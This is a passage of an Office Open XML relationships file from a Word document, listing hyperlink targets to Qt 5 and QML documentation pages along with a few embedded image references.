Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlscene.html" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-calendarstyle.html" TargetMode="External"/><Relationship Id="rId2049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qpainter.html" TargetMode="External"/><Relationship Id="rId2256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mapgesturearea.html" TargetMode="External"/><Relationship Id="rId1272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-sensor.html" TargetMode="External"/><Relationship Id="rId2116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-customgeometry-example.html" TargetMode="External"/><Relationship Id="rId2323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId2768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols2-guidelines.html" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/whatsnew50.html" TargetMode="External"/><Relationship Id="rId947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-gauge.html" TargetMode="External"/><Relationship Id="rId1132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-package.html" TargetMode="External"/><Relationship Id="rId1577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-topic.html" TargetMode="External"/><Relationship Id="rId1784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId2628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrendererinterface.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dtexture.html" TargetMode="External"/><Relationship Id="rId1437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-visualdatamodel.html" TargetMode="External"/><Relationship Id="rId1644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId2902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qwindow.html" TargetMode="External"/><Relationship Id="rId1504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-identifiedmodules.html" TargetMode="External"/><Relationship Id="rId1809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-conicalgradient.html" TargetMode="External"/><Relationship Id="rId2180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-textinput.html" TargetMode="External"/><Relationship Id="rId2485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parallelanimation.html" TargetMode="External"/><Relationship Id="rId3024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId1087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-menubarstyle.html" TargetMode="External"/><Relationship Id="rId1294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-sound.html" TargetMode="External"/><Relationship Id="rId2040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations.html" TargetMode="External"/><Relationship Id="rId2138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId2692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId2997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtnfc-index.html" TargetMode="External"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-cylindermesh.html" TargetMode="External"/><Relationship Id="rId969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-groupbox.html" TargetMode="External"/><Relationship Id="rId1599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-cppplugins.html" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-applicationwindow.html" TargetMode="External"/><Relationship Id="rId1154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathquad.html" TargetMode="External"/><Relationship Id="rId1361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId1459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginescript.html" TargetMode="External"/><Relationship Id="rId2205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId2412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-uniformanimator.html" TargetMode="External"/><Relationship Id="rId2857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-color.html" TargetMode="External"/><Relationship Id="rId1014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-itemselectionmodel.html" TargetMode="External"/><Relationship Id="rId1221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-rangeslider.html" TargetMode="External"/><Relationship Id="rId1666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-localstorage-example.html" TargetMode="External"/><Relationship Id="rId1873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-maskshape.html" TargetMode="External"/><Relationship Id="rId2717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlproperty.html" TargetMode="External"/><Relationship Id="rId1319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-statechangescript.html" TargetMode="External"/><Relationship Id="rId1526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-timer.html" TargetMode="External"/><Relationship Id="rId1733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId1800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcoreapplication.html" TargetMode="External"/><Relationship Id="rId2062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexture.html" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/09-qdoc-commands-includingimages.html" TargetMode="External"/><Relationship Id="rId686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmltypes.html" TargetMode="External"/><Relationship Id="rId893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-directionallight.html" TargetMode="External"/><Relationship Id="rId2367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId2574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-cppmodels.html" TargetMode="External"/><Relationship Id="rId2781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-barseries.html" TargetMode="External"/><Relationship Id="rId1176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-planegeometry.html" TargetMode="External"/><Relationship Id="rId1383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-timer.html" TargetMode="External"/><Relationship Id="rId2227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gradientstop.html" TargetMode="External"/><Relationship Id="rId1036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-label.html" TargetMode="External"/><Relationship Id="rId1243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rotationanimator.html" TargetMode="External"/><Relationship Id="rId1590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsql-attribution-sqlite.html" TargetMode="External"/><Relationship Id="rId1688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId2739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-state.html" TargetMode="External"/><Relationship Id="rId2946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-thresholdmask.html" TargetMode="External"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-checkbox.html" TargetMode="External"/><Relationship Id="rId918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-extendedattributes.html" TargetMode="External"/><Relationship Id="rId1450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginecertificateerror.html" TargetMode="External"/><Relationship Id="rId1548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qdatetime.html" TargetMode="External"/><Relationship Id="rId1755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-columnlayout.html" TargetMode="External"/><Relationship Id="rId2501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId1103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId1310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-stack.html" TargetMode="External"/><Relationship Id="rId1408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-translate.html" TargetMode="External"/><Relationship Id="rId1962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId2806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageprovider.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId1615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-topic.html" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" TargetMode="External"/><Relationship Id="rId2151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-topic.html" TargetMode="External"/><Relationship Id="rId2596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-list.html" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-button.html" TargetMode="External"/><Relationship Id="rId982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-holstersensor.html" TargetMode="External"/><Relationship Id="rId1198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-progressbarstyle.html" TargetMode="External"/><Relationship Id="rId2011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathanimation.html" TargetMode="External"/><Relationship Id="rId2663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId2870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-combobox.html" TargetMode="External"/><Relationship Id="rId1058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-logicaldevice.html" TargetMode="External"/><Relationship Id="rId1265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-scrollbar.html" TargetMode="External"/><Relationship Id="rId1472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId2109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph-renderer.html" TargetMode="External"/><Relationship Id="rId2316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId2523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.imagemagick.org/script/montage.php" TargetMode="External"/><Relationship Id="rId2730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-abstractphysicaldevice.html" TargetMode="External"/><Relationship Id="rId1125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-objectpicker.html" TargetMode="External"/><Relationship Id="rId1332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpurchasing-store.html" TargetMode="External"/><Relationship Id="rId1777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-customgeometry-example.html" TargetMode="External"/><Relationship Id="rId2828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialshader-renderstate.html" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-number.html" TargetMode="External"/><Relationship Id="rId1637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId1844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId1704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-directoryimports.html" TargetMode="External"/><Relationship Id="rId1911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId797" 